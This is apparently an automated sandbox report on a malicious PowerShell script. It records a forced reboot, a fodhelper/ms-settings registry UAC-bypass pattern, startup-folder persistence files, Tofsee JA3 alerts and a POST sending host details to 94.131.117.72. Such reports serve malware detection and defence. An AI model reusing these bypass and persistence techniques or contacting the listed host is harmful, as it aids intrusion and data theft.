Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 24, 2024, 9:10 a.m.	July 24, 2024, 9:13 a.m.

Size	20.4KB
Type	awk or perl script, ASCII text, with very long lines, with CRLF line terminators
MD5	`2ffeb8859aa9c7142ed094588a5442b8`
SHA256	`ca7336b967be2963e0465feda228aabe3bd098491acc6374619f636898a65eb9`
CRC32	`47969F0E`
ssdeep	`384:GNnnhca8iWyW+ud7/HLHajbwHcGlftuLGuIw+GZwNhODLMVqVGGGMrGMbGba0Ni/:GNnnhca8iWyW+ud7/r6jbw8GlftuLGuH`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\pw.ps1
2540
- shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 15
  2824
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
fsnat.shop	A 93.127.200.211	93.127.200.211

IP Address	Status	Action
164.124.101.2	Active	Moloch
93.127.200.211	Active	Moloch
94.131.117.72	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49158 -> 93.127.200.211:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49159 -> 93.127.200.211:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49160 -> 93.127.200.211:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49161 -> 93.127.200.211:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (47 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: Method invocation failed because [System.Object[]] doesn't contain a method nam console_handle: 0x00000023	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: ed 'ToUpper'. console_handle: 0x0000002f	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\pw.ps1:70 char:116 console_handle: 0x0000003b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + ${__\|\|\|\|\|\|_\|\|\|\|\|\|_\|//////\\\\\________________} = Get-Random -InputObject ${_ console_handle: 0x00000047	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: \|\|\|\|\|\|\|\|\|\|\|\|\|________________}.ToUpper <<<< () -Count 1 console_handle: 0x00000053	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + CategoryInfo : InvalidOperation: (ToUpper:String) [], RuntimeEx console_handle: 0x0000005f	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: ception console_handle: 0x0000006b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x00000077	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: Directory: C:\ console_handle: 0x00000097	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: Mode LastWriteTime Length Name console_handle: 0x000000a3	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: d---- 2024-07-24 오전 9:10 _yvfneu4_ console_handle: 0x000000ab	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: New-Item : Illegal characters in path. console_handle: 0x000000bf	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\pw.ps1:173 char:9 console_handle: 0x000000cb	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + New-Item <<<< ${TESTE} -ItemType Directory console_handle: 0x000000d7	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + CategoryInfo : InvalidArgument: (\\?\C:\Windows \System32\:Stri console_handle: 0x000000e3	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: ng) [New-Item], ArgumentException console_handle: 0x000000ef	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + FullyQualifiedErrorId : ItemExistsArgumentError,Microsoft.PowerShell.Com console_handle: 0x000000fb	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: mands.NewItemCommand console_handle: 0x00000107	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: Copy-Item : Cannot find path 'C:\Windows\System32\fodhelper.exe' because it doe console_handle: 0x00000127	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: s not exist. console_handle: 0x00000133	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\pw.ps1:174 char:10 console_handle: 0x0000013f	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + Copy-Item <<<< -Path "${_fiv_}" -Destination "${TESTE}${_six_}" -Recurse console_handle: 0x0000014b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + CategoryInfo : ObjectNotFound: (C:\Windows\System32\fodhelper.e console_handle: 0x00000157	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: xe:String) [Copy-Item], ItemNotFoundException console_handle: 0x00000163	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.CopyI console_handle: 0x0000016f	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: temCommand console_handle: 0x0000017b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\ console_handle: 0x00000023	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: Classes\ms-settings\Shell\Open\command console_handle: 0x00000027	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\ console_handle: 0x0000002b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: Classes\ms-settings\Shell\Open console_handle: 0x0000002f	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSChildName : command console_handle: 0x00000033	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSDrive : HKCU console_handle: 0x00000037	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSProvider : Microsoft.PowerShell.Core\Registry console_handle: 0x0000003b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSIsContainer : True console_handle: 0x0000003f	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: Property : {} console_handle: 0x00000043	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: SubKeyCount : 0 console_handle: 0x00000047	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: ValueCount : 0 console_handle: 0x0000004b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: Name : HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\comma console_handle: 0x0000004f	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: nd console_handle: 0x00000053	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Softwar console_handle: 0x00000063	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: e\Classes\ms-settings\Shell\Open\command console_handle: 0x00000067	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Softwar console_handle: 0x0000006b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: e\Classes\ms-settings\Shell\Open console_handle: 0x0000006f	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSChildName : command console_handle: 0x00000073	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSDrive : HKCU console_handle: 0x00000077	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: PSProvider : Microsoft.PowerShell.Core\Registry console_handle: 0x0000007b	1	1
WriteConsoleW July 24, 2024, 9:10 a.m.	buffer: DelegateExecute : console_handle: 0x0000007f	1	1

Uses Windows APIs to generate a cryptographic key (12 events)

Time & API	Arguments	Status	Return
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050bd5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 24, 2024, 9:10 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, POST method with no useragent header, Connection to IP address

suspicious_request

POST http://94.131.117.72/ldht/index.php

Performs some HTTP requests (1 event)

request

POST http://94.131.117.72/ldht/index.php

Sends data using the HTTP POST Method (1 event)

request

POST http://94.131.117.72/ldht/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 58 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06400000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06570000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06571000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06572000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06573000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06574000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05721000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05561000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06321000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06322000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bf4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bf8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06323000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05576000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05728000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05578000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0572a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0572b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0572c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06331000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0572d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0572e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0572f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:10 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_y.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_AA.lnk
file	C:\Users\Public\TEST22-PC_yvfneu4_.cmd
file	C:\Users\Public\TEST22-PC_yvfneu4_y.cmd
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_.lnk

Creates a shortcut to an executable file (4 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_y.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_AA.lnk

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 24, 2024, 9:10 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

HTTP/1.1 100 Continue

Poweshell is sending data to a remote host (2 events)

Data sent	POST /ldht/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 94.131.117.72 Content-Length: 88 Expect: 100-continue Connection: Keep-Alive
Data sent	AT= test22 TEST22-PC Microsoft Windows 7 Professional N Korean (Korea) 32-Bit CPU

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\system32\shutdown.exe" /r /t 15

Communicates with host for which no DNS query was performed (1 event)

host

94.131.117.72

Installs itself for autorun at Windows startup (3 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_y.lnk
